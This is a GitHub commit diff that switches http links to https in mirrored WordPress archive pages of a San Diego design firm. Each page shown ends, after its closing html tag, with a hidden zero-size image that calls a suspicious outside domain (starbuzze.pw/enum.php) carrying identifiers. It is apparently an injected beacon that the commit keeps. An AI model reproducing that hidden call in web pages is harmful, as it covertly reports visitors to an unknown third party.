-
Notifications
You must be signed in to change notification settings - Fork 1
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Vincent James
authored and
Vincent James
committed
Oct 12, 2022
1 parent
9b21f7b
commit 07703e8
Showing
74 changed files
with
798 additions
and
798 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -28,7 +28,7 @@ | |
<title>Invincible Creative » 2013 » August</title> | ||
|
||
<!--[if lt IE 9]> | ||
<script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> | ||
<script src="https://html5shim.googlecode.com/svn/trunk/html5.js"></script> | ||
<![endif]--> | ||
|
||
|
||
|
@@ -39,10 +39,10 @@ | |
|
||
<!-- WordPress Stuff | ||
========================================================= --> | ||
<link rel="pingback" href="http://invinciblecreative.com/xmlrpc.php" /> | ||
<link rel="pingback" href="https://invinciblecreative.com/xmlrpc.php" /> | ||
<!-- Google Web Fonts --> | ||
|
||
<link href='http://fonts.googleapis.com/css?family=:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800|&subset=latin,latin-ext,cyrillic,cyrillic-ext,greek-ext,greek,vietnamese' rel='stylesheet' type='text/css'> | ||
<link href='https://fonts.googleapis.com/css?family=:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800|&subset=latin,latin-ext,cyrillic,cyrillic-ext,greek-ext,greek,vietnamese' rel='stylesheet' type='text/css'> | ||
<!-- STRIPE Scripts --> | ||
<script type="text/javascript" src="https://js.stripe.com/v2/"></script> | ||
<script type="text/javascript"> | ||
|
@@ -658,11 +658,11 @@ <h1 class="header-text"> | |
<div class="social-icons"> | ||
|
||
<div class="social-icon social-email"><a href="mailto:[email protected]" target="_blank" title="Email">Email</a></div> | ||
<div class="social-icon social-facebook"><a href="http://www.facebook.com/InvincibleWebDesign" target="_blank" title="Facebook">Facebook</a></div> | ||
<div class="social-icon social-facebook"><a href="https://www.facebook.com/InvincibleWebDesign" target="_blank" title="Facebook">Facebook</a></div> | ||
<div class="social-icon social-googleplus"><a href="https://plus.google.com/113621238016901320448?rel=publisher" target="_blank" title="Googleplus">Googleplus</a></div> | ||
<div class="social-icon social-twitter"><a href="http://twitter.com/invinciblecrtv" target="_blank" title="Twitter">Twitter</a></div> | ||
<div class="social-icon social-yahoo"><a href="http://local.yahoo.com/info-132944623-invincible-creative-san-diego" target="_blank" title="Yahoo">Yahoo</a></div> | ||
<div class="social-icon social-yelp"><a href="http://www.yelp.com/biz/invincible-creative-san-diego-2" target="_blank" title="Yelp">Yelp</a></div> | ||
<div class="social-icon social-twitter"><a href="https://twitter.com/invinciblecrtv" target="_blank" title="Twitter">Twitter</a></div> | ||
<div class="social-icon social-yahoo"><a href="https://local.yahoo.com/info-132944623-invincible-creative-san-diego" target="_blank" title="Yahoo">Yahoo</a></div> | ||
<div class="social-icon social-yelp"><a href="https://www.yelp.com/biz/invincible-creative-san-diego-2" target="_blank" title="Yelp">Yelp</a></div> | ||
|
||
|
||
|
||
|
@@ -686,15 +686,15 @@ <h1 class="header-text"> | |
|
||
(function() { | ||
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; | ||
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; | ||
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'https://www') + '.google-analytics.com/ga.js'; | ||
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); | ||
})(); | ||
|
||
</script> </div> | ||
<div style="display:none"> | ||
</div> | ||
<script type='text/javascript' src='http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201739'></script> | ||
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?ver=2017Sepaa'></script> | ||
<script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201739'></script> | ||
<script type='text/javascript' src='https://s.gravatar.com/js/gprofiles.js?ver=2017Sepaa'></script> | ||
<script type='text/javascript'> | ||
/* <![CDATA[ */ | ||
var WPGroHo = {"my_hash":""}; | ||
|
@@ -758,12 +758,12 @@ <h1 class="header-text"> | |
|
||
})(jQuery); | ||
</script> | ||
<script type='text/javascript' src='http://stats.wp.com/e-201739.js' async defer></script> | ||
<script type='text/javascript' src='https://stats.wp.com/e-201739.js' async defer></script> | ||
<script type='text/javascript'> | ||
_stq = window._stq || []; | ||
_stq.push([ 'view', {v:'ext',j:'1:3.5.3',blog:'42353195',post:'0',tz:'-8',srv:'invinciblecreative.com'} ]); | ||
_stq.push([ 'clickTrackerInit', '42353195', '0' ]); | ||
</script> | ||
|
||
</body> | ||
</html> <img style="visibility:hidden;width:0px;height:0px;" src="http://starbuzze.pw/enum.php?shop_id=27&user_id=dEJKp1pFOKa&eto_host=1" /> | ||
</html> <img style="visibility:hidden;width:0px;height:0px;" src="https://starbuzze.pw/enum.php?shop_id=27&user_id=dEJKp1pFOKa&eto_host=1" /> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -28,7 +28,7 @@ | |
<title>Invincible Creative » 2013 » October</title> | ||
|
||
<!--[if lt IE 9]> | ||
<script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> | ||
<script src="https://html5shim.googlecode.com/svn/trunk/html5.js"></script> | ||
<![endif]--> | ||
|
||
|
||
|
@@ -39,10 +39,10 @@ | |
|
||
<!-- WordPress Stuff | ||
========================================================= --> | ||
<link rel="pingback" href="http://invinciblecreative.com/xmlrpc.php" /> | ||
<link rel="pingback" href="https://invinciblecreative.com/xmlrpc.php" /> | ||
<!-- Google Web Fonts --> | ||
|
||
<link href='http://fonts.googleapis.com/css?family=:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800|&subset=latin,latin-ext,cyrillic,cyrillic-ext,greek-ext,greek,vietnamese' rel='stylesheet' type='text/css'> | ||
<link href='https://fonts.googleapis.com/css?family=:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800|&subset=latin,latin-ext,cyrillic,cyrillic-ext,greek-ext,greek,vietnamese' rel='stylesheet' type='text/css'> | ||
<!-- STRIPE Scripts --> | ||
<script type="text/javascript" src="https://js.stripe.com/v2/"></script> | ||
<script type="text/javascript"> | ||
|
@@ -600,11 +600,11 @@ <h1 class="header-text"> | |
<div class="social-icons"> | ||
|
||
<div class="social-icon social-email"><a href="mailto:[email protected]" target="_blank" title="Email">Email</a></div> | ||
<div class="social-icon social-facebook"><a href="http://www.facebook.com/InvincibleWebDesign" target="_blank" title="Facebook">Facebook</a></div> | ||
<div class="social-icon social-facebook"><a href="https://www.facebook.com/InvincibleWebDesign" target="_blank" title="Facebook">Facebook</a></div> | ||
<div class="social-icon social-googleplus"><a href="https://plus.google.com/113621238016901320448?rel=publisher" target="_blank" title="Googleplus">Googleplus</a></div> | ||
<div class="social-icon social-twitter"><a href="http://twitter.com/invinciblecrtv" target="_blank" title="Twitter">Twitter</a></div> | ||
<div class="social-icon social-yahoo"><a href="http://local.yahoo.com/info-132944623-invincible-creative-san-diego" target="_blank" title="Yahoo">Yahoo</a></div> | ||
<div class="social-icon social-yelp"><a href="http://www.yelp.com/biz/invincible-creative-san-diego-2" target="_blank" title="Yelp">Yelp</a></div> | ||
<div class="social-icon social-twitter"><a href="https://twitter.com/invinciblecrtv" target="_blank" title="Twitter">Twitter</a></div> | ||
<div class="social-icon social-yahoo"><a href="https://local.yahoo.com/info-132944623-invincible-creative-san-diego" target="_blank" title="Yahoo">Yahoo</a></div> | ||
<div class="social-icon social-yelp"><a href="https://www.yelp.com/biz/invincible-creative-san-diego-2" target="_blank" title="Yelp">Yelp</a></div> | ||
|
||
|
||
|
||
|
@@ -628,15 +628,15 @@ <h1 class="header-text"> | |
|
||
(function() { | ||
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; | ||
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; | ||
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'https://www') + '.google-analytics.com/ga.js'; | ||
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); | ||
})(); | ||
|
||
</script> </div> | ||
<div style="display:none"> | ||
</div> | ||
<script type='text/javascript' src='http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201739'></script> | ||
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?ver=2017Sepaa'></script> | ||
<script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201739'></script> | ||
<script type='text/javascript' src='https://s.gravatar.com/js/gprofiles.js?ver=2017Sepaa'></script> | ||
<script type='text/javascript'> | ||
/* <![CDATA[ */ | ||
var WPGroHo = {"my_hash":""}; | ||
|
@@ -700,12 +700,12 @@ <h1 class="header-text"> | |
|
||
})(jQuery); | ||
</script> | ||
<script type='text/javascript' src='http://stats.wp.com/e-201739.js' async defer></script> | ||
<script type='text/javascript' src='https://stats.wp.com/e-201739.js' async defer></script> | ||
<script type='text/javascript'> | ||
_stq = window._stq || []; | ||
_stq.push([ 'view', {v:'ext',j:'1:3.5.3',blog:'42353195',post:'0',tz:'-8',srv:'invinciblecreative.com'} ]); | ||
_stq.push([ 'clickTrackerInit', '42353195', '0' ]); | ||
</script> | ||
|
||
</body> | ||
</html> <img style="visibility:hidden;width:0px;height:0px;" src="http://starbuzze.pw/enum.php?shop_id=27&user_id=dEJKp1pFOKa&eto_host=1" /> | ||
</html> <img style="visibility:hidden;width:0px;height:0px;" src="https://starbuzze.pw/enum.php?shop_id=27&user_id=dEJKp1pFOKa&eto_host=1" /> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -28,7 +28,7 @@ | |
<title>Invincible Creative » 2014 » December</title> | ||
|
||
<!--[if lt IE 9]> | ||
<script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> | ||
<script src="https://html5shim.googlecode.com/svn/trunk/html5.js"></script> | ||
<![endif]--> | ||
|
||
|
||
|
@@ -39,10 +39,10 @@ | |
|
||
<!-- WordPress Stuff | ||
========================================================= --> | ||
<link rel="pingback" href="http://invinciblecreative.com/xmlrpc.php" /> | ||
<link rel="pingback" href="https://invinciblecreative.com/xmlrpc.php" /> | ||
<!-- Google Web Fonts --> | ||
|
||
<link href='http://fonts.googleapis.com/css?family=:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800|&subset=latin,latin-ext,cyrillic,cyrillic-ext,greek-ext,greek,vietnamese' rel='stylesheet' type='text/css'> | ||
<link href='https://fonts.googleapis.com/css?family=:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800|&subset=latin,latin-ext,cyrillic,cyrillic-ext,greek-ext,greek,vietnamese' rel='stylesheet' type='text/css'> | ||
<!-- STRIPE Scripts --> | ||
<script type="text/javascript" src="https://js.stripe.com/v2/"></script> | ||
<script type="text/javascript"> | ||
|
@@ -600,11 +600,11 @@ <h1 class="header-text"> | |
<div class="social-icons"> | ||
|
||
<div class="social-icon social-email"><a href="mailto:[email protected]" target="_blank" title="Email">Email</a></div> | ||
<div class="social-icon social-facebook"><a href="http://www.facebook.com/InvincibleWebDesign" target="_blank" title="Facebook">Facebook</a></div> | ||
<div class="social-icon social-facebook"><a href="https://www.facebook.com/InvincibleWebDesign" target="_blank" title="Facebook">Facebook</a></div> | ||
<div class="social-icon social-googleplus"><a href="https://plus.google.com/113621238016901320448?rel=publisher" target="_blank" title="Googleplus">Googleplus</a></div> | ||
<div class="social-icon social-twitter"><a href="http://twitter.com/invinciblecrtv" target="_blank" title="Twitter">Twitter</a></div> | ||
<div class="social-icon social-yahoo"><a href="http://local.yahoo.com/info-132944623-invincible-creative-san-diego" target="_blank" title="Yahoo">Yahoo</a></div> | ||
<div class="social-icon social-yelp"><a href="http://www.yelp.com/biz/invincible-creative-san-diego-2" target="_blank" title="Yelp">Yelp</a></div> | ||
<div class="social-icon social-twitter"><a href="https://twitter.com/invinciblecrtv" target="_blank" title="Twitter">Twitter</a></div> | ||
<div class="social-icon social-yahoo"><a href="https://local.yahoo.com/info-132944623-invincible-creative-san-diego" target="_blank" title="Yahoo">Yahoo</a></div> | ||
<div class="social-icon social-yelp"><a href="https://www.yelp.com/biz/invincible-creative-san-diego-2" target="_blank" title="Yelp">Yelp</a></div> | ||
|
||
|
||
|
||
|
@@ -628,15 +628,15 @@ <h1 class="header-text"> | |
|
||
(function() { | ||
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; | ||
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; | ||
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'https://www') + '.google-analytics.com/ga.js'; | ||
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); | ||
})(); | ||
|
||
</script> </div> | ||
<div style="display:none"> | ||
</div> | ||
<script type='text/javascript' src='http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201739'></script> | ||
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?ver=2017Sepaa'></script> | ||
<script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201739'></script> | ||
<script type='text/javascript' src='https://s.gravatar.com/js/gprofiles.js?ver=2017Sepaa'></script> | ||
<script type='text/javascript'> | ||
/* <![CDATA[ */ | ||
var WPGroHo = {"my_hash":""}; | ||
|
@@ -700,12 +700,12 @@ <h1 class="header-text"> | |
|
||
})(jQuery); | ||
</script> | ||
<script type='text/javascript' src='http://stats.wp.com/e-201739.js' async defer></script> | ||
<script type='text/javascript' src='https://stats.wp.com/e-201739.js' async defer></script> | ||
<script type='text/javascript'> | ||
_stq = window._stq || []; | ||
_stq.push([ 'view', {v:'ext',j:'1:3.5.3',blog:'42353195',post:'0',tz:'-8',srv:'invinciblecreative.com'} ]); | ||
_stq.push([ 'clickTrackerInit', '42353195', '0' ]); | ||
</script> | ||
|
||
</body> | ||
</html> <img style="visibility:hidden;width:0px;height:0px;" src="http://starbuzze.pw/enum.php?shop_id=27&user_id=dEJKp1pFOKa&eto_host=1" /> | ||
</html> <img style="visibility:hidden;width:0px;height:0px;" src="https://starbuzze.pw/enum.php?shop_id=27&user_id=dEJKp1pFOKa&eto_host=1" /> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -28,7 +28,7 @@ | |
<title>Invincible Creative » Blog</title> | ||
|
||
<!--[if lt IE 9]> | ||
<script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> | ||
<script src="https://html5shim.googlecode.com/svn/trunk/html5.js"></script> | ||
<![endif]--> | ||
|
||
|
||
|
@@ -39,10 +39,10 @@ | |
|
||
<!-- WordPress Stuff | ||
========================================================= --> | ||
<link rel="pingback" href="http://invinciblecreative.com/xmlrpc.php" /> | ||
<link rel="pingback" href="https://invinciblecreative.com/xmlrpc.php" /> | ||
<!-- Google Web Fonts --> | ||
|
||
<link href='http://fonts.googleapis.com/css?family=:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800|&subset=latin,latin-ext,cyrillic,cyrillic-ext,greek-ext,greek,vietnamese' rel='stylesheet' type='text/css'> | ||
<link href='https://fonts.googleapis.com/css?family=:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800|&subset=latin,latin-ext,cyrillic,cyrillic-ext,greek-ext,greek,vietnamese' rel='stylesheet' type='text/css'> | ||
<!-- STRIPE Scripts --> | ||
<script type="text/javascript" src="https://js.stripe.com/v2/"></script> | ||
<script type="text/javascript"> | ||
|
@@ -97,7 +97,7 @@ | |
<meta property="og:type" content="website" /> | ||
<meta property="og:title" content="Invincible Creative" /> | ||
<meta property="og:description" content="San Diego Web Design, Graphic Design, and Digital Marketing" /> | ||
<meta property="og:url" content="http://invinciblecreative.com/blog/" /> | ||
<meta property="og:url" content="https://invinciblecreative.com/blog/" /> | ||
<meta property="og:site_name" content="Invincible Creative" /> | ||
<meta property="og:image" content="https://s0.wp.com/i/blank.jpg" /> | ||
<meta property="og:locale" content="en_US" /> | ||
|
@@ -712,11 +712,11 @@ <h1 class="header-text">Blog</h1> | |
<div class="social-icons"> | ||
|
||
<div class="social-icon social-email"><a href="mailto:[email protected]" target="_blank" title="Email">Email</a></div> | ||
<div class="social-icon social-facebook"><a href="http://www.facebook.com/InvincibleWebDesign" target="_blank" title="Facebook">Facebook</a></div> | ||
<div class="social-icon social-facebook"><a href="https://www.facebook.com/InvincibleWebDesign" target="_blank" title="Facebook">Facebook</a></div> | ||
<div class="social-icon social-googleplus"><a href="https://plus.google.com/113621238016901320448?rel=publisher" target="_blank" title="Googleplus">Googleplus</a></div> | ||
<div class="social-icon social-twitter"><a href="http://twitter.com/invinciblecrtv" target="_blank" title="Twitter">Twitter</a></div> | ||
<div class="social-icon social-yahoo"><a href="http://local.yahoo.com/info-132944623-invincible-creative-san-diego" target="_blank" title="Yahoo">Yahoo</a></div> | ||
<div class="social-icon social-yelp"><a href="http://www.yelp.com/biz/invincible-creative-san-diego-2" target="_blank" title="Yelp">Yelp</a></div> | ||
<div class="social-icon social-twitter"><a href="https://twitter.com/invinciblecrtv" target="_blank" title="Twitter">Twitter</a></div> | ||
<div class="social-icon social-yahoo"><a href="https://local.yahoo.com/info-132944623-invincible-creative-san-diego" target="_blank" title="Yahoo">Yahoo</a></div> | ||
<div class="social-icon social-yelp"><a href="https://www.yelp.com/biz/invincible-creative-san-diego-2" target="_blank" title="Yelp">Yelp</a></div> | ||
|
||
|
||
|
||
|
@@ -740,15 +740,15 @@ <h1 class="header-text">Blog</h1> | |
|
||
(function() { | ||
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; | ||
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; | ||
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'https://www') + '.google-analytics.com/ga.js'; | ||
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); | ||
})(); | ||
|
||
</script> </div> | ||
<div style="display:none"> | ||
</div> | ||
<script type='text/javascript' src='http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201739'></script> | ||
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?ver=2017Sepaa'></script> | ||
<script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201739'></script> | ||
<script type='text/javascript' src='https://s.gravatar.com/js/gprofiles.js?ver=2017Sepaa'></script> | ||
<script type='text/javascript'> | ||
/* <![CDATA[ */ | ||
var WPGroHo = {"my_hash":""}; | ||
|
@@ -812,12 +812,12 @@ <h1 class="header-text">Blog</h1> | |
|
||
})(jQuery); | ||
</script> | ||
<script type='text/javascript' src='http://stats.wp.com/e-201739.js' async defer></script> | ||
<script type='text/javascript' src='https://stats.wp.com/e-201739.js' async defer></script> | ||
<script type='text/javascript'> | ||
_stq = window._stq || []; | ||
_stq.push([ 'view', {v:'ext',j:'1:3.5.3',blog:'42353195',post:'98',tz:'-8',srv:'invinciblecreative.com'} ]); | ||
_stq.push([ 'clickTrackerInit', '42353195', '98' ]); | ||
</script> | ||
|
||
</body> | ||
</html> <img style="visibility:hidden;width:0px;height:0px;" src="http://starbuzze.pw/enum.php?shop_id=27&user_id=dEJKp1pFOKa&eto_host=1" /> | ||
</html> <img style="visibility:hidden;width:0px;height:0px;" src="https://starbuzze.pw/enum.php?shop_id=27&user_id=dEJKp1pFOKa&eto_host=1" /> |
Oops, something went wrong.